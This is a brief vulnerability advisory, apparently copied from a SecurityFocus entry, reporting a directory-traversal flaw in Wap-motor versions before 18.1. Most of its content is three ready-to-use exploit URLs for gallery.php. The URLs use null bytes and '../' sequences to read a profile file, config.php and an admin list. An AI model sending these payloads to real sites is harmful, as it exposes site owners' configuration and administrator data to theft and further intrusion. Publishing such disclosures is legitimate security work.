11 lines
No EOL
587 B
Text
11 lines
No EOL
587 B
Text
source: https://www.securityfocus.com/bid/44223/info
|
|
|
|
Wap-motor is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input.
|
|
|
|
Exploiting this issue may allow an attacker to obtain sensitive information that could aid in further attacks.
|
|
|
|
Versions prior to Wap-motor 18.1 are vulnerable.
|
|
|
|
http://www.example.com/gallery/gallery.php?image=%00../profil/Twost.prof%00.gif
|
|
http://www.example.com/gallery/gallery.php?image=%00../../template/config.php%00.gif
|
|
http://www.example.com/gallery/gallery.php?image=%00../datatmp/adminlist.dat%00.gif |